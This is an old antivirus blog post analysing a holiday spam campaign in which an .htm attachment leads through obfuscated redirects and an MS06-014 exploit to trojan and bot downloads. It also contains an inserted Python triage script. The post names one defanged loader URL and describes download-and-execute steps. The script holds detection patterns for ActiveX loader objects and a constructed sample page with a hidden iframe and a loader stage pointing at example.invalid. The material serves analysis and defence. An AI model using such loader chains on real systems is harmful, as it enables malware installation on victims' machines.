
Happy Holidays and a Malware Package for You

  • Posted: December 7, 2006
  • Threat category: Uncategorized
  • Author: Virus Analyst

Holiday season is near and, just as we expected, malware has come to exploit the occasion. Add to that the fact that pharmaceutical come-ons and ploys via spammed emails are increasing these days, and this incident is worthy of a write-up.


Early this morning, we received a report that an email with an .htm attachment was being spammed on the net. A screenshot of the email is seen below.



The email attachment, Holliday_Pharmacy-Blowout-Deals_HERE.htm (take note of the spelling of Holliday), entices people to view the HTML file.


This is a fresh approach in terms of mail-propagating malware, since it uses an HTML file as an attachment rather than the usual .exe or .zip file. But since HTML files can still execute code, they are still very dangerous to view, especially if they come from an email you are not expecting.


Upon viewing the attachment, the JavaScript code inside it is executed, which loads the site:


http://BrightBoo{blocked}0eF7ce8fc50T34b5400d5593Bf11ea


A couple of minutes earlier, the site was inaccessible; however, after a round of attempts at fetching the site, we finally were able to dig up some nasties.


From here on we have another case of an FTBM, or what is known as the Follow The Bouncing Malware scenario, which ultimately leads to the installation of a bot on your systems. Below is a summary of the malware track (so far…)



  • Holliday_Pharmacy-Blowout-Deals_HERE.htm
    • The malicious attachment; contains obfuscated JavaScript code that loads the site “http://BrightBooksDire{blocked}fc50T34b5400d5593Bf11ea”. Detected by Trend Micro as JS_REDIR.AI.

  • http://BrightBooksDi{blocked}8fc50T34b5400d5593Bf11ea (index.ht{blocked}34b5400d5593Bf11ea)
    • Contains another obfuscated JavaScript code that loads http://{blocked}/404.php. Detected by Trend Micro as JS_REDIR.AJ.

  • http://{blocked}/404.php
    • Contains another obfuscated JavaScript code that loads http://{blocked}/external.php, detected as JS_WONKA.AC, through an iframe.

  • http://{blocked}/external.php
    • Contains obfuscated VBScript code that downloads and executes the file http://{blocked}/win32_update.exe through the MS06-014 vulnerability. The downloaded file is already detected by Trend Micro as TROJ_SMALL.FAR.

  • http://{blocked}/win32_update.exe (TROJ_SMALL.FAR)
    • Downloads and executes http{blocked}.com/exp/01.exe and http://{blocked}.com/exp/02.exe, detected by Trend Micro as TROJ_DELF.DGR and WORM_IRCBOT.RV respectively.

  • http://{blocked}/exp/01.exe
    • Drops other malicious files on the system.

  • http://{blocked}/exp/02.exe
    • A bot malware.

  • http://{blocked}/index.html
    • This HTML redirects to http://{blocked}/exp/exploit.php. They are detected by Trend Micro as HTML_REDIR.AQ and JS_PSYME.FT respectively.

  • http://{blocked}/exp/exploit.php
    • Contains JavaScript code that downloads the file hxxp://olatesuite.com/exp/loader_exe.php and saves it to the local computer as “c:\ie7_update.exe”. The downloaded file is detected as TROJ_DLOADER.IAT.

Every malicious code and behavior that has been described above will not be seen by the user; instead, a blank 404 or Not Found page will be seen. Sneaky!
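As an added illustration (not part of the original post), here is a small Python triage script for an .htm attachment of this kind. It peels percent/HTML encoding, then flags the patterns this chain relies on: script and iframe tags, encoded strings fed to unescape()/eval, VBScript with ActiveX loader objects (RDS.DataSpace is the MDAC control that MS06-014 patches; that mapping is not stated on this page), and URLs ending in .exe. The sample attachment, hostnames and URLs are constructed for the demo.

```python
import re
from html import unescape as html_unescape
from urllib.parse import unquote

# Indicators worth flagging in an unsolicited .htm attachment. RDS.DataSpace is the
# MDAC ActiveX control patched by MS06-014 (known fact, not from the post); the
# other loader objects and the obfuscation patterns are generic.
INDICATORS = {
    "script_block":    re.compile(r"<script\b", re.I),
    "vbscript":        re.compile(r"vbscript", re.I),
    "iframe":          re.compile(r"<iframe\b", re.I),
    "js_decode_eval":  re.compile(r"\b(unescape|eval|String\.fromCharCode)\s*\(", re.I),
    "percent_encoded": re.compile(r"(%[0-9a-f]{2}){6,}", re.I),   # long %XX runs
    "activex_loader":  re.compile(r"RDS\.DataSpace|ADODB\.Stream|WScript\.Shell", re.I),
    "exe_url":         re.compile(r"https?://[^\s\"'<>]+\.exe\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def decode_layers(text, max_rounds=3):
    """Peel simple HTML-entity and %XX encodings so content hidden inside
    unescape("...") strings becomes visible to the indicator regexes."""
    for _ in range(max_rounds):
        new = unquote(html_unescape(text))
        if new == text:
            break
        text = new
    return text

def triage_html(content):
    """Return which indicators fire (on raw or decoded text), the URLs found
    after decoding, and a simple count used as a triage score."""
    decoded = decode_layers(content)
    hits = {n: bool(rx.search(content) or rx.search(decoded)) for n, rx in INDICATORS.items()}
    urls = sorted(set(URL_RE.findall(decoded)))
    return {"hits": hits, "urls": urls, "score": sum(hits.values())}

# Constructed stand-in for the attachment: a fake 404 page hiding an encoded
# iframe loader and a VBScript stage, mirroring the chain described above.
SAMPLE = """<html><body>404 Not Found
<script>document.write(unescape("%3C%69%66%72%61%6D%65%20src%3D%22http%3A%2F%2Fexample.invalid%2F404.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<script language="vbscript">
' loader stage stand-in: CreateObject("RDS.DataSpace") then fetch http://example.invalid/win32_update.exe
</script></body></html>"""
BENIGN = "<html><body><p>Seasonal greetings</p></body></html>"

if __name__ == "__main__":
    print(triage_html(SAMPLE))   # all seven indicators fire, score 7
    print(triage_html(BENIGN))   # nothing fires, score 0
```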



As we are still analyzing the files further, we will update this blog once more information is gathered.


In the meantime, here are things you can do to mitigate this holiday menace.



  • Since the jump-off point of the malware is an HTM document, try disabling JavaScript in your browser. You can also use Mozilla Firefox with the NoScript plugin. This will virtually eliminate any chance of the malware kicking off.
  • Also, the malware author used the MS06-014 exploit to download and execute an .exe file. This wouldn’t be a problem if your systems are updated with the latest patch from Microsoft. If you’re not patched yet, well, I guess this is as good a time as any to start patching, don’t you think?
  • So we better watch out, and better not cry… We just have to be aware of these holiday computer threats so that our holidays will indeed be merry, bright and peaceful! Cheers!
